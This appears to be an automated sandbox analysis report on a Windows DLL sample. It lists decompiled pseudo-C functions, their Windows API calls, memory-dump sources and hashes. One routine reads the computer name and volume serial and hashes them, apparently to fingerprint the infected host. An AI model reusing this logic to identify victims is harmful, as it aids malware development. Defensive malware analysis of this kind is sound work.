									_t188 = _t141;
									_t191 = _t141;
									r11d = _t113;
									_t205 = _t139;
									if(_t113 > 0) {
										while(_t82 <  *_t175) {
											_t173 = _t175[2];
											_t82 = _t82 + 3;
											r8b =  *(_t173 + _t188 + 1);
											_t88 =  *((intOrPtr*)(_t173 + _t188));
											_t188 = _t188 + 3;
											r8b = r8b & 0x0000003f;
											r8b = r8b << 6;
											_t87 = _t88 << 0x00000004 | r8b >> 0x00000002;
											 *(_t205 + _t191 * 2) = ( *(_t173 + _t188 - 1) & 0x0000003f | r8b) & 0x000000ff | ((_t88 << 0x00000004 | r8b >> 0x00000002) & 0x000000ff) << 0x00000008;
											_t191 = _t191 + 1;
											if(_t191 < _t194) {
												continue;
											}
											goto L37;
										}
									}
									L37:
									r9d = _t113;
									_t55 = E67704E58(_t82, _t87, _t141, _t205, _t198,  *(_t181 + 0x30), _t175, _t178,  *(_t181 + 0x30));
									_t141 = _t139;
									free(??);
								}
								free();
								free(??);
								free(??);
								free(??);
							} else {
								goto L28;
							}
						}
					}
				}
				L46:
				return _t55;
			}






















































                                                                                                                                                  0x67704afc
                                                                                                                                                  0x67704afc
                                                                                                                                                  0x67704aff
                                                                                                                                                  0x67704b03
                                                                                                                                                  0x67704b13
                                                                                                                                                  0x67704b17
                                                                                                                                                  0x67704b19
                                                                                                                                                  0x67704b1b
                                                                                                                                                  0x67704b1e
                                                                                                                                                  0x67704b25
                                                                                                                                                  0x67704b2d
                                                                                                                                                  0x67704b36
                                                                                                                                                  0x67704b3a
                                                                                                                                                  0x67704b43
                                                                                                                                                  0x67704b45
                                                                                                                                                  0x67704b4c
                                                                                                                                                  0x67704b51
                                                                                                                                                  0x67704b54
                                                                                                                                                  0x67704b59
                                                                                                                                                  0x67704b5c
                                                                                                                                                  0x67704b60
                                                                                                                                                  0x67704b65
                                                                                                                                                  0x67704b6a
                                                                                                                                                  0x67704b70
                                                                                                                                                  0x67704b78
                                                                                                                                                  0x67704b88
                                                                                                                                                  0x67704b98
                                                                                                                                                  0x67704ba0
                                                                                                                                                  0x67704ba6
                                                                                                                                                  0x67704ca4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67704bac
                                                                                                                                                  0x67704bac
                                                                                                                                                  0x67704bae
                                                                                                                                                  0x67704bb3
                                                                                                                                                  0x67704bb8
                                                                                                                                                  0x67704bbb
                                                                                                                                                  0x67704bbb
                                                                                                                                                  0x67704bc0
                                                                                                                                                  0x67704bc5
                                                                                                                                                  0x67704bc8
                                                                                                                                                  0x67704bcb
                                                                                                                                                  0x67704bd8
                                                                                                                                                  0x67704bdb
                                                                                                                                                  0x67704bde
                                                                                                                                                  0x67704be5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67704be5
                                                                                                                                                  0x67704bcb
                                                                                                                                                  0x67704be7
                                                                                                                                                  0x67704bea
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67704bec
                                                                                                                                                  0x67704bec
                                                                                                                                                  0x67704bee
                                                                                                                                                  0x67704bf1
                                                                                                                                                  0x67704bbb
                                                                                                                                                  0x67704bf5
                                                                                                                                                  0x67704bf7
                                                                                                                                                  0x67704cac
                                                                                                                                                  0x67704cac
                                                                                                                                                  0x67704bfd
                                                                                                                                                  0x67704bfd
                                                                                                                                                  0x67704bff
                                                                                                                                                  0x67704c02
                                                                                                                                                  0x67704c04
                                                                                                                                                  0x67704c09
                                                                                                                                                  0x67704c11
                                                                                                                                                  0x67704c14
                                                                                                                                                  0x67704c14
                                                                                                                                                  0x67704c1a
                                                                                                                                                  0x67704c1f
                                                                                                                                                  0x67704c22
                                                                                                                                                  0x67704c25
                                                                                                                                                  0x67704c32
                                                                                                                                                  0x67704c35
                                                                                                                                                  0x67704c38
                                                                                                                                                  0x67704c3f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67704c3f
                                                                                                                                                  0x67704c25
                                                                                                                                                  0x67704c41
                                                                                                                                                  0x67704c44
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67704c46
                                                                                                                                                  0x67704c46
                                                                                                                                                  0x67704c48
                                                                                                                                                  0x67704c4b
                                                                                                                                                  0x67704c4f
                                                                                                                                                  0x67704c4f
                                                                                                                                                  0x67704c51
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67704c5c
                                                                                                                                                  0x67704c64
                                                                                                                                                  0x67704c69
                                                                                                                                                  0x67704c73
                                                                                                                                                  0x67704c76
                                                                                                                                                  0x67704c7b
                                                                                                                                                  0x67704c7e
                                                                                                                                                  0x67704c84
                                                                                                                                                  0x67704c86
                                                                                                                                                  0x67704c8a
                                                                                                                                                  0x67704c8d
                                                                                                                                                  0x67704c95
                                                                                                                                                  0x67704c98
                                                                                                                                                  0x67704c9b
                                                                                                                                                  0x67704c9b
                                                                                                                                                  0x67704c8d
                                                                                                                                                  0x67704ca0
                                                                                                                                                  0x67704ca7
                                                                                                                                                  0x67704caa
                                                                                                                                                  0x67704cb3
                                                                                                                                                  0x67704cba
                                                                                                                                                  0x67704cc5
                                                                                                                                                  0x67704cca
                                                                                                                                                  0x67704ccc
                                                                                                                                                  0x67704cd1
                                                                                                                                                  0x67704cd3
                                                                                                                                                  0x67704cdc
                                                                                                                                                  0x67704ce0
                                                                                                                                                  0x67704ce2
                                                                                                                                                  0x67704ce5
                                                                                                                                                  0x67704ce8
                                                                                                                                                  0x67704cdc
                                                                                                                                                  0x67704cec
                                                                                                                                                  0x67704cf0
                                                                                                                                                  0x67704cf5
                                                                                                                                                  0x67704da3
                                                                                                                                                  0x67704daf
                                                                                                                                                  0x67704db7
                                                                                                                                                  0x67704dbc
                                                                                                                                                  0x67704dbf
                                                                                                                                                  0x67704dc2
                                                                                                                                                  0x67704dc5
                                                                                                                                                  0x67704dca
                                                                                                                                                  0x67704dcc
                                                                                                                                                  0x67704dd0
                                                                                                                                                  0x67704dd4
                                                                                                                                                  0x67704dd7
                                                                                                                                                  0x67704dde
                                                                                                                                                  0x67704dea
                                                                                                                                                  0x67704def
                                                                                                                                                  0x67704e01
                                                                                                                                                  0x67704e07
                                                                                                                                                  0x67704e0d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67704e0f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67704e0f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67704e0d
                                                                                                                                                  0x67704dcc
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67704dca
                                                                                                                                                  0x67704d04
                                                                                                                                                  0x67704d10
                                                                                                                                                  0x67704d18
                                                                                                                                                  0x67704d1d
                                                                                                                                                  0x67704d20
                                                                                                                                                  0x67704d23
                                                                                                                                                  0x67704d26
                                                                                                                                                  0x67704d2b
                                                                                                                                                  0x67704d2d
                                                                                                                                                  0x67704d31
                                                                                                                                                  0x67704d35
                                                                                                                                                  0x67704d38
                                                                                                                                                  0x67704d3d
                                                                                                                                                  0x67704d41
                                                                                                                                                  0x67704d45
                                                                                                                                                  0x67704d4f
                                                                                                                                                  0x67704d56
                                                                                                                                                  0x67704d6f
                                                                                                                                                  0x67704d75
                                                                                                                                                  0x67704d7b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67704d7b
                                                                                                                                                  0x67704d2d
                                                                                                                                                  0x67704d7d
                                                                                                                                                  0x67704d82
                                                                                                                                                  0x67704d8e
                                                                                                                                                  0x67704d96
                                                                                                                                                  0x67704d99
                                                                                                                                                  0x67704d99
                                                                                                                                                  0x67704e1c
                                                                                                                                                  0x67704e24
                                                                                                                                                  0x67704e2d
                                                                                                                                                  0x67704e35
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67704caa
                                                                                                                                                  0x67704c51
                                                                                                                                                  0x67704bf7
                                                                                                                                                  0x67704e3d
                                                                                                                                                  0x67704e54

                                                                                                                                                  APIs
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,67704873,?,?,?,?,00000000,00000000,?,67706DCB), ref: 67704B3A
                                                                                                                                                  • malloc.LIBCMT ref: 67704B4C
                                                                                                                                                    • Part of subcall function 67706FE0: _FF_MSGBANNER.LIBCMT ref: 67707010
                                                                                                                                                    • Part of subcall function 67706FE0: RtlAllocateHeap.NTDLL(?,?,?,67703907,?,?,?,67703955,?,?,?,677042F0,?,?,?,67704207), ref: 67707035
                                                                                                                                                    • Part of subcall function 67706FE0: _callnewh.LIBCMT ref: 6770704E
                                                                                                                                                    • Part of subcall function 67706FE0: _errno.LIBCMT ref: 67707059
                                                                                                                                                    • Part of subcall function 67706FE0: _errno.LIBCMT ref: 67707064
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,67704873,?,?,?,?,00000000,00000000,?,67706DCB), ref: 67704B6A
                                                                                                                                                  • calloc.LIBCMT ref: 67704C64
                                                                                                                                                  • calloc.LIBCMT ref: 67704C76
                                                                                                                                                  • calloc.LIBCMT ref: 67704CC5
                                                                                                                                                  • calloc.LIBCMT ref: 67704D18
                                                                                                                                                  • free.LIBCMT ref: 67704D99
                                                                                                                                                  • calloc.LIBCMT ref: 67704DB7
                                                                                                                                                  • free.LIBCMT ref: 67704E1C
                                                                                                                                                  • free.LIBCMT ref: 67704E24
                                                                                                                                                  • free.LIBCMT ref: 67704E2D
                                                                                                                                                  • free.LIBCMT ref: 67704E35
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: callocfree$ByteCharMultiWide_errno$AllocateHeap_callnewhmalloc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4007914538-0
                                                                                                                                                  • Opcode ID: 75a72e4593ea814a993d65902ccb4c67b435976bfe97a8512559ec31ad0efeb2
                                                                                                                                                  • Instruction ID: 702481af84d07ca4a4b9785106237c5ebaf89778d9b813cc6feaddadd86c947b
                                                                                                                                                  • Opcode Fuzzy Hash: 75a72e4593ea814a993d65902ccb4c67b435976bfe97a8512559ec31ad0efeb2
                                                                                                                                                  • Instruction Fuzzy Hash: 948178B7304B8446CA218F6A9A5465E77D2FBAFFD8F444221CFAA47791EB38C056D301
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 67705B7C, Relevance: 10.6, APIs: 7, Instructions: 104stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,67704927,?,?,?,?,00000000,00000000,?,67706DCB,?,?,00000000,677013F3), ref: 67705BA5
                                                                                                                                                  • lstrlenA.KERNEL32(?,?,?,?,00000000,00000000,?,67706DCB,?,?,00000000,677013F3), ref: 67705BB3
                                                                                                                                                  • malloc.LIBCMT ref: 67705BC2
                                                                                                                                                  • lstrlenA.KERNEL32 ref: 67705BFD
                                                                                                                                                  • lstrlenA.KERNEL32 ref: 67705C18
                                                                                                                                                  • free.LIBCMT ref: 67705C25
                                                                                                                                                  • _strrev.LIBCMT ref: 67705CA7
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: lstrlen$_strrevfreemalloc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 619123190-0
                                                                                                                                                  • Opcode ID: 05fb07168ff8aa86256b5538a1ab4810528475d2ff39fa64deea1ab0e4dcbccf
                                                                                                                                                  • Instruction ID: cc0d1116669abea0e785cbc656369e5f5a4a258ec2ac9d2d562b016a60c73e55
                                                                                                                                                  • Opcode Fuzzy Hash: 05fb07168ff8aa86256b5538a1ab4810528475d2ff39fa64deea1ab0e4dcbccf
                                                                                                                                                  • Instruction Fuzzy Hash: 83314DB230878146D7099F26FA94B2AA6D6B79DBC8F084934DF4B4FB54DB38D0868340
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 677080D8, Relevance: 10.6, APIs: 7, Instructions: 93threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 51%
                                                                                                                                                  			E677080D8(void* __ecx, long long __edx, void* __edi, void* __esi, void* __ebp, long long __rax, void* __rcx, void* __rdx, void* __rdi, void* __rsi, void* __rbp, long long __r8, long long _a24) {
				void* __rbx;
				void* _t4;
				long long _t7;
				long long _t10;
				void* _t15;
				long long _t16;
				long long _t20;
				long long _t21;
				void* _t24;
				void* _t32;
				intOrPtr* _t39;
				intOrPtr* _t41;
				long long _t43;

				_t50 = __r8;
				_t46 = __rbp;
				_t45 = __rsi;
				_t44 = __rdi;
				_t42 = __rdx;
				_t40 = __rcx;
				_t37 = __rax;
				_t32 = __edi;
				_t29 = __edx;
				_t24 = __ecx;
				_a24 = __r8;
				_t38 = __r8;
				if(__edx != 1) {
					__eflags = __edx;
					if(__edx != 0) {
						__eflags = __edx - 2;
						if(__edx != 2) {
							__eflags = __edx - 3;
							if(__edx == 3) {
								__eflags = 0;
								E67708F98(__rax, __rcx);
							}
							L28:
							_t4 = 1;
							L29:
							return _t4;
						}
						E67708CD8();
						_t7 = E6770C14C(__r8, __rcx, __rdx, __rdi, __rsi, __rbp); // executed
						_t39 = _t37;
						__eflags = _t37;
						if(_t37 == 0) {
							L2:
							_t4 = 0;
							goto L29;
						}
						_t43 = _t37;
						__imp__FlsSetValue();
						_t41 = _t39;
						__eflags = _t7;
						if(_t7 == 0) {
							free();
							goto L2;
						}
						E67708D04(_t39, _t41, _t43);
						 *_t39 = GetCurrentThreadId();
						 *(_t39 + 8) =  *(_t39 + 8) | 0xffffffff;
						goto L28;
					}
					_t10 =  *0x67717400; // 0x1
					__eflags = _t10;
					if(_t10 <= 0) {
						goto L2;
					}
					_t11 = _t10 - 1;
					 *0x67717400 = _t10 - 1;
					__eflags =  *0x677179e4 - _t29; // 0x0
					if(__eflags == 0) {
						_t11 = E67708988(__rax, __r8, __rdx, __rsi);
					}
					__eflags = _t38;
					if(_t38 == 0) {
						E67708CDC(E6770C52C(_t11, _t38, _t45), _t38, _t45, _t46);
						_t11 = E677085FC();
					}
					__eflags = _t38;
					if(_t38 == 0) {
						__eflags =  *0x67716180 - 0xffffffff;
						if( *0x67716180 != 0xffffffff) {
							E67708CDC(_t11, _t38, _t45, _t46);
						}
					}
					goto L28;
				}
				_t15 = E677085A4(__rax); // executed
				if(_t15 != 0) {
					_t16 = E67708FD8(_t29, __esi, __rax, _t40, __rdx, __rdi, __rsi); // executed
					__eflags = _t16;
					if(_t16 != 0) {
						E6770CA8C(_t16, _t38);
						GetCommandLineA();
						 *0x67719b38 = _t37;
						E6770C998(__ebp, _t38, __rdi, __rsi, __rbp);
						 *0x67717408 = _t37;
						_t20 = E6770C258(_t37, _t38, __rdx, _t44);
						__eflags = _t20;
						if(_t20 >= 0) {
							_t21 = E6770C8A0(_t38, _t45, _t50);
							__eflags = _t21;
							if(_t21 < 0) {
								L11:
								_t20 = E6770C52C(_t21, _t38, _t45);
								goto L6;
							}
							_t21 = E6770C5A0(_t24, _t37, _t38, _t42, _t45, _t46); // executed
							__eflags = _t21;
							if(_t21 < 0) {
								goto L11;
							}
							_t21 = E6770873C(0, _t32, _t37, _t38, _t42, _t50); // executed
							__eflags = _t21;
							if(_t21 != 0) {
								goto L11;
							} else {
								 *0x67717400 =  *0x67717400 + 1;
								goto L28;
							}
						}
						L6:
						E67708CDC(_t20, _t38, _t45, _t46);
					}
					E677085FC();
				}
				goto L2;
			}
















                                                                                                                                                  0x677080d8
                                                                                                                                                  0x677080d8
                                                                                                                                                  0x677080d8
                                                                                                                                                  0x677080d8
                                                                                                                                                  0x677080d8
                                                                                                                                                  0x677080d8
                                                                                                                                                  0x677080d8
                                                                                                                                                  0x677080d8
                                                                                                                                                  0x677080d8
                                                                                                                                                  0x677080d8
                                                                                                                                                  0x677080d8
                                                                                                                                                  0x677080e2
                                                                                                                                                  0x677080e8
                                                                                                                                                  0x67708167
                                                                                                                                                  0x67708169
                                                                                                                                                  0x677081b8
                                                                                                                                                  0x677081bb
                                                                                                                                                  0x67708213
                                                                                                                                                  0x67708216
                                                                                                                                                  0x67708218
                                                                                                                                                  0x6770821a
                                                                                                                                                  0x6770821a
                                                                                                                                                  0x6770821f
                                                                                                                                                  0x6770821f
                                                                                                                                                  0x67708224
                                                                                                                                                  0x67708229
                                                                                                                                                  0x67708229
                                                                                                                                                  0x677081bd
                                                                                                                                                  0x677081cc
                                                                                                                                                  0x677081d1
                                                                                                                                                  0x677081d4
                                                                                                                                                  0x677081d7
                                                                                                                                                  0x677080f3
                                                                                                                                                  0x677080f3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x677080f3
                                                                                                                                                  0x677081dd
                                                                                                                                                  0x677081e6
                                                                                                                                                  0x677081ec
                                                                                                                                                  0x677081ef
                                                                                                                                                  0x677081f1
                                                                                                                                                  0x67708209
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67708209
                                                                                                                                                  0x677081f5
                                                                                                                                                  0x67708200
                                                                                                                                                  0x67708202
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67708202
                                                                                                                                                  0x6770816b
                                                                                                                                                  0x67708171
                                                                                                                                                  0x67708173
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67708179
                                                                                                                                                  0x6770817b
                                                                                                                                                  0x67708181
                                                                                                                                                  0x67708187
                                                                                                                                                  0x67708189
                                                                                                                                                  0x67708189
                                                                                                                                                  0x6770818e
                                                                                                                                                  0x67708191
                                                                                                                                                  0x67708198
                                                                                                                                                  0x6770819d
                                                                                                                                                  0x6770819d
                                                                                                                                                  0x677081a3
                                                                                                                                                  0x677081a6
                                                                                                                                                  0x677081a8
                                                                                                                                                  0x677081af
                                                                                                                                                  0x677081b1
                                                                                                                                                  0x677081b1
                                                                                                                                                  0x677081af
                                                                                                                                                  0x00000000
                                                                                                                                                  0x677081a6
                                                                                                                                                  0x677080ea
                                                                                                                                                  0x677080f1
                                                                                                                                                  0x677080fa
                                                                                                                                                  0x677080ff
                                                                                                                                                  0x67708101
                                                                                                                                                  0x6770810a
                                                                                                                                                  0x6770810f
                                                                                                                                                  0x67708115
                                                                                                                                                  0x6770811c
                                                                                                                                                  0x67708121
                                                                                                                                                  0x67708128
                                                                                                                                                  0x6770812d
                                                                                                                                                  0x6770812f
                                                                                                                                                  0x67708138
                                                                                                                                                  0x6770813d
                                                                                                                                                  0x6770813f
                                                                                                                                                  0x67708160
                                                                                                                                                  0x67708160
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67708160
                                                                                                                                                  0x67708141
                                                                                                                                                  0x67708146
                                                                                                                                                  0x67708148
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770814c
                                                                                                                                                  0x67708151
                                                                                                                                                  0x67708153
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67708155
                                                                                                                                                  0x67708155
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67708155
                                                                                                                                                  0x67708153
                                                                                                                                                  0x67708131
                                                                                                                                                  0x67708131
                                                                                                                                                  0x67708131
                                                                                                                                                  0x67708103
                                                                                                                                                  0x67708103
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 677085A4: HeapCreate.KERNELBASE ref: 677085BA
                                                                                                                                                    • Part of subcall function 677085A4: GetVersion.KERNEL32 ref: 677085CC
                                                                                                                                                    • Part of subcall function 677085A4: HeapSetInformation.KERNEL32 ref: 677085EA
                                                                                                                                                  • _RTC_Initialize.LIBCMT ref: 6770810A
                                                                                                                                                  • GetCommandLineA.KERNEL32 ref: 6770810F
                                                                                                                                                    • Part of subcall function 6770C998: GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,67708121), ref: 6770C9B1
                                                                                                                                                    • Part of subcall function 6770C998: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,67708121), ref: 6770CA08
                                                                                                                                                    • Part of subcall function 6770C998: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,67708121), ref: 6770CA43
                                                                                                                                                    • Part of subcall function 6770C998: free.LIBCMT ref: 6770CA50
                                                                                                                                                    • Part of subcall function 6770C998: FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,67708121), ref: 6770CA5B
                                                                                                                                                    • Part of subcall function 6770C258: GetStartupInfoW.KERNEL32 ref: 6770C279
                                                                                                                                                  • __setargv.LIBCMT ref: 67708138
                                                                                                                                                  • _cinit.LIBCMT ref: 6770814C
                                                                                                                                                    • Part of subcall function 67708CDC: FlsFree.KERNEL32(?,?,?,?,677081B6), ref: 67708CEB
                                                                                                                                                    • Part of subcall function 67708CDC: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,677081B6), ref: 6770CE5B
                                                                                                                                                    • Part of subcall function 67708CDC: free.LIBCMT ref: 6770CE64
                                                                                                                                                    • Part of subcall function 67708CDC: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,677081B6), ref: 6770CE8B
                                                                                                                                                    • Part of subcall function 6770C52C: free.LIBCMT ref: 6770C57D
                                                                                                                                                    • Part of subcall function 6770C14C: Sleep.KERNEL32(?,?,?,67708DEF,?,?,?,67708525,?,?,?,?,6770707E), ref: 6770C191
                                                                                                                                                  • FlsSetValue.KERNEL32 ref: 677081E6
                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 677081FA
                                                                                                                                                  • free.LIBCMT ref: 67708209
                                                                                                                                                    • Part of subcall function 67706FA0: HeapFree.KERNEL32(?,?,00000000,67708E28,?,?,?,67708525,?,?,?,?,6770707E), ref: 67706FB6
                                                                                                                                                    • Part of subcall function 67706FA0: _errno.LIBCMT ref: 67706FC0
                                                                                                                                                    • Part of subcall function 67706FA0: GetLastError.KERNEL32(?,?,00000000,67708E28,?,?,?,67708525,?,?,?,?,6770707E), ref: 67706FC8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: free$FreeHeap$ByteCharCriticalDeleteEnvironmentMultiSectionStringsWide$CommandCreateCurrentErrorInfoInformationInitializeLastLineSleepStartupThreadValueVersion__setargv_cinit_errno
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 125979975-0
                                                                                                                                                  • Opcode ID: 933bd66c81beca2d3d34a4d1bd661b47a4a54058a3c8c80404ee3f7dca038748
                                                                                                                                                  • Instruction ID: 632943658ddce873a17cf10b214e4e0cca4cd077c1148e5d934a0974f5fd0580
                                                                                                                                                  • Opcode Fuzzy Hash: 933bd66c81beca2d3d34a4d1bd661b47a4a54058a3c8c80404ee3f7dca038748
                                                                                                                                                  • Instruction Fuzzy Hash: EA3181F060D70189FB0067B59B4835E21E5AF6E36DF684E38CB2585391FF3980618723
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6770379C, Relevance: 10.6, APIs: 7, Instructions: 75stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 49%
                                                                                                                                                  			E6770379C(void* __edi, void* __esp, long long __rbx, long long __rsi, void* __r8, long long _a8, long long _a16) {
				void* _v8;
				signed int _v24;
				void* _v168;
				void* _v208;
				char _v212;
				char _v216;
				char _v224;
				long long _v232;
				long long _v240;
				long long _v248;
				void* __rdi;
				void* _t33;
				void* _t46;
				void* _t47;
				void* _t49;
				signed long long _t51;
				signed long long _t52;
				long long _t73;
				void* _t84;

				_t87 = __r8;
				_t81 = __rsi;
				_t54 = __rbx;
				_t46 = __edi;
				_a8 = __rbx;
				_a16 = __rsi;
				_t51 =  *0x67716000; // 0x9b7b11e8241
				_t52 = _t51 ^ _t84 - 0x00000110;
				_v24 = _t52;
				_t73 =  &_v212;
				_v212 = 0x10;
				GetComputerNameW(??, ??); // executed
				_v224 = 0;
				_v232 = _t73;
				_v240 = _t73;
				r8d = 0;
				_v248 = _t73;
				GetVolumeInformationW(??, ??, ??, ??, ??, ??, ??, ??); // executed
				r8d = _v216;
				wsprintfA(??, ??);
				asm("repne scasb");
				E67703938(0, __esp, _t52, __rbx,  &_v168, __rsi, __r8);
				E67703A1C(_t49, _t54, _t52, __rsi); // executed
				E677039E8(_t46, __esp, _t52, _t52, _t52, _t52);
				E67703B5C(_t47, _t52, _t52,  *((intOrPtr*)(_t52 + 8)), _t81);
				_t82 = _t52;
				E677039E8(_t46, __esp, _t52, _t52, _t52, _t52);
				_t33 = calloc(??, ??);
				r8d = 0x208;
				E67709420(_t33, 0x104, 0, _t52,  !( &_v168 | 0xffffffff) - 1, _t87);
				lstrcpyW(??, ??);
				lstrcatW(??, ??);
				_t19 = _t82 + 4; // 0x4
				r9d = 7;
				E677079E8(_t52, _t52, ":", _t19,  &_v216);
				free(??);
				return E67706F80(0x104, _v24 ^ _t84 - 0x00000110);
			}






















                                                                                                                                                  0x6770379c
                                                                                                                                                  0x6770379c
                                                                                                                                                  0x6770379c
                                                                                                                                                  0x6770379c
                                                                                                                                                  0x6770379c
                                                                                                                                                  0x677037a1
                                                                                                                                                  0x677037ae
                                                                                                                                                  0x677037b5
                                                                                                                                                  0x677037b8
                                                                                                                                                  0x677037c0
                                                                                                                                                  0x677037ca
                                                                                                                                                  0x677037d2
                                                                                                                                                  0x677037df
                                                                                                                                                  0x677037e3
                                                                                                                                                  0x677037e8
                                                                                                                                                  0x677037ed
                                                                                                                                                  0x677037f2
                                                                                                                                                  0x677037f7
                                                                                                                                                  0x677037fd
                                                                                                                                                  0x6770380e
                                                                                                                                                  0x6770381f
                                                                                                                                                  0x6770382d
                                                                                                                                                  0x67703838
                                                                                                                                                  0x67703843
                                                                                                                                                  0x6770384c
                                                                                                                                                  0x67703854
                                                                                                                                                  0x67703857
                                                                                                                                                  0x67703868
                                                                                                                                                  0x6770386f
                                                                                                                                                  0x6770387b
                                                                                                                                                  0x67703888
                                                                                                                                                  0x67703898
                                                                                                                                                  0x6770389e
                                                                                                                                                  0x677038a2
                                                                                                                                                  0x677038ad
                                                                                                                                                  0x677038b5
                                                                                                                                                  0x677038e1

                                                                                                                                                  APIs
                                                                                                                                                  • GetComputerNameW.KERNEL32 ref: 677037D2
                                                                                                                                                  • GetVolumeInformationW.KERNELBASE ref: 677037F7
                                                                                                                                                  • wsprintfA.USER32 ref: 6770380E
                                                                                                                                                    • Part of subcall function 67703A1C: CryptCreateHash.ADVAPI32 ref: 67703A62
                                                                                                                                                    • Part of subcall function 67703A1C: CryptHashData.ADVAPI32 ref: 67703A76
                                                                                                                                                    • Part of subcall function 67703A1C: CryptGetHashParam.ADVAPI32 ref: 67703A99
                                                                                                                                                    • Part of subcall function 67703A1C: lstrcpyA.KERNEL32 ref: 67703AB5
                                                                                                                                                    • Part of subcall function 67703A1C: free.LIBCMT ref: 67703AC3
                                                                                                                                                    • Part of subcall function 67703A1C: malloc.LIBCMT ref: 67703ACB
                                                                                                                                                    • Part of subcall function 67703A1C: malloc.LIBCMT ref: 67703ADB
                                                                                                                                                    • Part of subcall function 67703A1C: CryptDestroyHash.ADVAPI32 ref: 67703B2C
                                                                                                                                                    • Part of subcall function 677039E8: free.LIBCMT ref: 67703A03
                                                                                                                                                  • calloc.LIBCMT ref: 67703868
                                                                                                                                                    • Part of subcall function 6770763C: _errno.LIBCMT ref: 6770765F
                                                                                                                                                    • Part of subcall function 6770763C: _errno.LIBCMT ref: 67707669
                                                                                                                                                  • lstrcpyW.KERNEL32 ref: 67703888
                                                                                                                                                  • lstrcatW.KERNEL32 ref: 67703898
                                                                                                                                                  • free.LIBCMT ref: 677038B5
                                                                                                                                                    • Part of subcall function 67706FA0: HeapFree.KERNEL32(?,?,00000000,67708E28,?,?,?,67708525,?,?,?,?,6770707E), ref: 67706FB6
                                                                                                                                                    • Part of subcall function 67706FA0: _errno.LIBCMT ref: 67706FC0
